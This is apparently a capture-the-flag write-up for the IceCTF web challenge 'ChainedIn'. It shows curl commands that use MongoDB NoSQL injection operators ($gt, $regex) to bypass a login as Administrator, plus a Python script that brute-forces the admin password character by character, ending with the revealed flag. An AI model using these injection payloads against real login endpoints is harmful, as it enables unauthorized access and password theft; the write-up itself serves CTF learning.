IceCTF [Web] - ChainedIn

Web mongodb, noSql, web Comments

The objective on this one was to get the administrator password on the website.

http://chainedin.vuln.icec.tf/

This first thing we can see is that this level is powered by MongoDB and angular.js, we can start thinking about finding some nosql injection from here.

After reading something here I saw it was possible to inject mongodb http://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb.html. Tryed to do the most common injection to bypass the login:

1
2
3

kinyabitch@Debian ~/h/c/chainedin> curl -H "Content-Type: application/json" -d '{"user": {"$gt": ""},"pass": {"$gt": ""}}' 'http://chainedin.vuln.icec.tf/login'
{"message":"Welcome back Administrator!"}

And voila i’m logged in as the admin, but can’t find the flag so I started thinking maybe there is a way to modify the injection (something like a boolean based or timed based injection like in we do on normal sql injections) after some reading on mongodb documentation(https://docs.mongodb.com/manual/reference/operator/query/regex/) I found this $regex parameter was perfect for boolean injection, we could retrieve the password character by character like this:

You can see here when we start the construction of our flag we receive a “true” boolean message saying “welcome back administrator”:

1
2
3
4


kinyabitch@Debian ~/h/c/chainedin> curl -H "Content-Type: application/json" -d '{"user": {"$gt": ""},"pass": {"$regex": "IceCT"}}' 'http://chainedin.vuln.icec.tf/login'
{"message":"Welcome back Administrator!";}

But if we put an invalid character we will get the message “Invalid Credentials”, so with this we get our “False” boolean.

1
2
3
4


kinyabitch@Debian ~/h/c/chainedin> curl -H ';Content-Type: application/json'; -d '{"user": {"$gt": ""},"pass": {"$regex": "IceCTA"}}' 'http://chainedin.vuln.icec.tf/login'
{"message":"Invalid Credentials"}

With this we can brute force the password character by character getting the flag :) here is the python script I wrote:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23


import requests
import json
import cookielib

flag = 'IceCTF{';
blacklist = []
alphabet = 'abcdefghijklmnopqrstuvxwyzABCDEFGHIJKLMNOPQRSTUVXWYZ0123456789_{}'
count = 0
max = len(alphabet)
while True:
    for char in alphabet:
        url = "http://chainedin.vuln.icec.tf/login";
        data = {"user": {"$gt": "Administrator"},"pass": {"$regex": "%s" % flag + char}}
        headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}
        r = requests.post(url, data=json.dumps(data), headers=headers)
        if (r.text == '{"message":"Welcome back Administrator!"}'):
            count = 0
            flag += char
            print flag
            if char == '}':
                exit(0)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50

kinyabitch@Debian ~/h/c/chainedin> python chained.py 
IceCTF{I
IceCTF{I_
IceCTF{I_t
IceCTF{I_th
IceCTF{I_thO
IceCTF{I_thOu
IceCTF{I_thOug
IceCTF{I_thOugH
IceCTF{I_thOugHT
IceCTF{I_thOugHT_
IceCTF{I_thOugHT_Y
IceCTF{I_thOugHT_YO
IceCTF{I_thOugHT_YOu
IceCTF{I_thOugHT_YOu_
IceCTF{I_thOugHT_YOu_c
IceCTF{I_thOugHT_YOu_co
IceCTF{I_thOugHT_YOu_cou
IceCTF{I_thOugHT_YOu_coul
IceCTF{I_thOugHT_YOu_coulD
IceCTF{I_thOugHT_YOu_coulDN
IceCTF{I_thOugHT_YOu_coulDNt
IceCTF{I_thOugHT_YOu_coulDNt_
IceCTF{I_thOugHT_YOu_coulDNt_i
IceCTF{I_thOugHT_YOu_coulDNt_in
IceCTF{I_thOugHT_YOu_coulDNt_inJ
IceCTF{I_thOugHT_YOu_coulDNt_inJe
IceCTF{I_thOugHT_YOu_coulDNt_inJeC
IceCTF{I_thOugHT_YOu_coulDNt_inJeCt
IceCTF{I_thOugHT_YOu_coulDNt_inJeCt_
IceCTF{I_thOugHT_YOu_coulDNt_inJeCt_n
IceCTF{I_thOugHT_YOu_coulDNt_inJeCt_no
IceCTF{I_thOugHT_YOu_coulDNt_inJeCt_noS
IceCTF{I_thOugHT_YOu_coulDNt_inJeCt_noSq
IceCTF{I_thOugHT_YOu_coulDNt_inJeCt_noSqL
IceCTF{I_thOugHT_YOu_coulDNt_inJeCt_noSqL_
IceCTF{I_thOugHT_YOu_coulDNt_inJeCt_noSqL_t
IceCTF{I_thOugHT_YOu_coulDNt_inJeCt_noSqL_tH
IceCTF{I_thOugHT_YOu_coulDNt_inJeCt_noSqL_tHa
IceCTF{I_thOugHT_YOu_coulDNt_inJeCt_noSqL_tHan
IceCTF{I_thOugHT_YOu_coulDNt_inJeCt_noSqL_tHanK
IceCTF{I_thOugHT_YOu_coulDNt_inJeCt_noSqL_tHanKs
IceCTF{I_thOugHT_YOu_coulDNt_inJeCt_noSqL_tHanKs_
IceCTF{I_thOugHT_YOu_coulDNt_inJeCt_noSqL_tHanKs_m
IceCTF{I_thOugHT_YOu_coulDNt_inJeCt_noSqL_tHanKs_mo
IceCTF{I_thOugHT_YOu_coulDNt_inJeCt_noSqL_tHanKs_mon
IceCTF{I_thOugHT_YOu_coulDNt_inJeCt_noSqL_tHanKs_monG
IceCTF{I_thOugHT_YOu_coulDNt_inJeCt_noSqL_tHanKs_monGo
IceCTF{I_thOugHT_YOu_coulDNt_inJeCt_noSqL_tHanKs_monGo}

TeamRocketISTCTF Team

Portuguese Computer Science Students